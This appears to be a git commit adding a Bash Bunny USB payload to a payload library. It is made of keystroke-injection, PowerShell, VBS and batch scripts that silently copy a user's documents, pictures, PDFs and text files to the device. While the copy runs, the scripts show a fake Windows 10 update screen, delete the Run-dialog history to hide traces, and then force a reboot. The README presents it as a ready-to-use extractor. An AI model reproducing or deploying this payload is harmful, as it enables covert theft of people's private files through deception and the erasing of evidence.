USB Exfiltration Payload with Win10 Fake Update V020821 (#455)

* USB Exfiltration Payload with Win10 Fake Update This Payload exfiltrates defined files to the Bunny. While copying is in progress, it shows a Fake Win10 Update Screen and removes traces. When it's ready, the target machine is forced to reboot. * Correction for the Key injection F11 * Create test * Delete payloads/library/USB_Exfil_with_Fake_Update _and_force-reboot directory * Create tst * Add files via upload * Delete tst * Delete payloads/library/exfiltration/USB Exfil with Fake Update and force reboot directory
2021-10-01 00:08:02 +02:00 · 2021-10-01 00:08:02 +02:00 · ee97a0820d
parent e79e39f95d
commit ee97a0820d
5 changed files with 99 additions and 0 deletions
--- a/payloads/library/exfiltration/USB_Exfil_with_Fake_Update
+++ b/payloads/library/exfiltration/USB_Exfil_with_Fake_Update
@ -0,0 +1 @@
+CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
--- a/payloads/library/exfiltration/USB_Exfil_with_Fake_Update
+++ b/payloads/library/exfiltration/USB_Exfil_with_Fake_Update
@ -0,0 +1,9 @@
+# Executes z.cmd from the switch position's folder, thus launching x.cmd silently using i.vbs, closes ExplorerWindow after mounting and sets MSEdge in Fullscreen
+GET SWITCH_POSITION
+LED ATTACK
+ATTACKMODE HID STORAGE
+QUACK ALT F4
+RUN WIN powershell -WindowStyle hidden -exec bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\z.cmd')"
+Q DELAY 2000
+Q F11
+LED FINISH
--- a/payloads/library/exfiltration/USB_Exfil_with_Fake_Update
+++ b/payloads/library/exfiltration/USB_Exfil_with_Fake_Update
@ -0,0 +1,33 @@
+# Fake Win10 Update Extractor based on Simple USB File Extractor by DanTheGoodman
+---
+- Author: HackingMark
+- Creds: thehappydinoa, sebkinne, DanTheGoodman
+
+
+### Description
+---
+A stupid easy to use file extractor leveraging the USB storage attack mode. Will stuff the found files in the `/loot/USB-Exfiltration/Computername-Date` folder. Also deletes the run-line history because why not. At the start of the Copy Process a Fake Windows10 Update screen shows up and if all files are copied there is a forced reboot.
+
+### BashBunny MK II
+If you are using a SD-Card for Exfiltration, you should copy the Payload folder on it. X.cmd must be presented in the /Payloads/§Switch/ folder.
+
+### Dependencies
+---
+None :)
+
+
+
+### Configuration (optional)
+---
+By default the payload is set to pull all .jpg, .txt, .pdf and .docx files from the Desktop, Downloads, and Documents folders and the full Picture folder. You can add new items/locations by making new xcopy lines in the x.cmd file.
+
+
+### Status:
+---
+|LED|Status|
+|---|---|
+|Yellow single blink|Running payload|
+|Solid Green|Payload executed|
+
+---
+All files are copied when the PC reboots. Have fun ;)
--- a/payloads/library/exfiltration/USB_Exfil_with_Fake_Update
+++ b/payloads/library/exfiltration/USB_Exfil_with_Fake_Update
@ -0,0 +1,53 @@
+@echo on
+@echo Installing Windows Update
+
+REM start fake Update
+start msedge -fullscreen http://fakeupdate.net/win10/index.html
+
+REM Delete registry keys storing Run dialog history
+REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
+
+REM Set the location
+set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%
+mkdir %dst% >>nul
+
+if Exist %USERPROFILE%\Documents (
+REM /C Continues copying even if errors occur.
+REM /Q Does not display file names while copying.
+REM /G Allows the copying of encrypted files to destination that does not support encryption.
+REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
+REM /E Copies directories and subdirectories, including empty ones.
+
+REM Add more of the line below specifying the location and file type
+REM The below example grabs all .pdf files from the user's documents folder
+REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
+
+xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.jpg %dst% >>nul
+xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.pdf %dst% >>nul
+xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.docx %dst% >>nul
+xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.txt %dst% >>nul
+)
+
+if Exist %USERPROFILE%\Desktop (
+xcopy /C /Q /G /Y %USERPROFILE%\Desktop\*.pdf %dst% >>nul
+xcopy /C /Q /G /Y %USERPROFILE%\Desktop\*.docx %dst% >>nul
+xcopy /C /Q /G /Y %USERPROFILE%\Desktop\*.txt %dst% >>nul
+xcopy /C /Q /G /Y %USERPROFILE%\Desktop\*.jpg %dst% >>nul
+)
+
+if Exist %USERPROFILE%\Pictures (
+xcopy /C /Q /G /Y /E %USERPROFILE%\Pictures\ %dst% >>nul
+
+)
+
+if Exist %USERPROFILE%\Downloads (
+xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.pdf %dst% >>nul
+xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.txt %dst% >>nul
+xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.docx %dst% >>nul
+xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.jpg %dst% >>nul
+)
+REM Force Restart
+Shutdown -r -f -t 00
+
+@cls
+@exit
--- a/payloads/library/exfiltration/USB_Exfil_with_Fake_Update
+++ b/payloads/library/exfiltration/USB_Exfil_with_Fake_Update
@ -0,0 +1,3 @@
+@echo off
+cscript %~dp0\i.vbs %~dp0\x.cmd
+@exit
				`@ -0,0 +1 @@`
				`CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False`